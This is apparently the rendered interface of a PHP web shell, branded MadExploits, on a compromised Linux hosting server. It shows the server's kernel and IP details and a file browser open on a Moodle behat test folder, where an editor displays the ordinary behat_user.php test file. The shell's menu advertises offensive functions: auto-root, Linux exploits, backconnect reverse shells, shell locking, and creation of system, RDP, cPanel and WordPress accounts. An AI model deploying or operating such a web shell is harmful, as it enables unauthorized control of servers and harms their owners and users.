Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.71.254.93
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
user /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
add_blocks.feature
865
B
-rw-r--r--
addnewuser.feature
827
B
-rw-r--r--
behat_user.php
3.19
KB
-rw-r--r--
bulk_editenrolment.feature
2.93
KB
-rw-r--r--
bulk_message.feature
1.49
KB
-rw-r--r--
course_preference.feature
1.47
KB
-rw-r--r--
custom_profile_fields.feature
10.78
KB
-rw-r--r--
delete_users.feature
4.62
KB
-rw-r--r--
edit_user_enrolment.feature
6.83
KB
-rw-r--r--
edit_user_roles.feature
1.62
KB
-rw-r--r--
edituserpassword.feature
2.38
KB
-rw-r--r--
enrol_cohort_list.feature
2.23
KB
-rw-r--r--
filter_idnumber.feature
3.18
KB
-rw-r--r--
filter_participants.feature
46.51
KB
-rw-r--r--
filter_participants_showall.fe...
6.73
KB
-rw-r--r--
full_name_display.feature
4.68
KB
-rw-r--r--
hidden_user_fields.feature
2.09
KB
-rw-r--r--
input-purpose.feature
2
KB
-rw-r--r--
name_fields.feature
3.02
KB
-rw-r--r--
participants_in_group_modes.fe...
9.9
KB
-rw-r--r--
reset_page.feature
915
B
-rw-r--r--
set_default_homepage.feature
2.54
KB
-rw-r--r--
set_email_display.feature
3.25
KB
-rw-r--r--
table_column_visibility.featur...
2.44
KB
-rw-r--r--
table_sorting.feature
3
KB
-rw-r--r--
user_grade_navigation.feature
4.61
KB
-rw-r--r--
view_full_profile.feature
5.15
KB
-rw-r--r--
view_participants.feature
15.19
KB
-rw-r--r--
view_participants_groups.featu...
3.38
KB
-rw-r--r--
view_preferences_page.feature
3.33
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : behat_user.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * User steps definition. * * @package core_user * @category test * @copyright 2017 Damyon Wiese * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ // NOTE: no MOODLE_INTERNAL test here, this file may be required by behat before including /config.php. require_once(__DIR__ . '/../../../lib/behat/behat_base.php'); use Behat\Mink\Exception\ExpectationException as ExpectationException; /** * Steps definitions for users. * * @package core_user * @category test * @copyright 2017 Damyon Wiese * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ class behat_user extends behat_base { /** * Choose from the bulk action menu. * * @Given /^I choose "(?P<nodetext_string>(?:[^"]|\\")*)" from the participants page bulk action menu$/ * @param string $nodetext The menu item to select. */ public function i_choose_from_the_participants_page_bulk_action_menu($nodetext) { $this->execute("behat_forms::i_set_the_field_to", [ "With selected users...", $this->escape($nodetext) ]); } /** * The input field should have autocomplete set to this value. * * @Then /^the field "(?P<field_string>(?:[^"]|\\")*)" should have purpose "(?P<purpose_string>(?:[^"]|\\")*)"$/ * @param string $field The field to select. * @param string $purpose The expected purpose. */ public function the_field_should_have_purpose($field, $purpose) { $fld = behat_field_manager::get_form_field_from_label($field, $this); $value = $fld->get_attribute('autocomplete'); if ($value != $purpose) { $reason = 'The "' . $field . '" field does not have purpose "' . $purpose . '"'; throw new ExpectationException($reason, $this->getSession()); } } /** * The input field should not have autocomplete set to this value. * * @Then /^the field "(?P<field_string>(?:[^"]|\\")*)" should not have purpose "(?P<purpose_string>(?:[^"]|\\")*)"$/ * @param string $field The field to select. * @param string $purpose The expected purpose we do not want. */ public function the_field_should_not_have_purpose($field, $purpose) { $fld = behat_field_manager::get_form_field_from_label($field, $this); $value = $fld->get_attribute('autocomplete'); if ($value == $purpose) { throw new ExpectationException('The "' . $field . '" field does have purpose "' . $purpose . '"', $this->getSession()); } } }
Close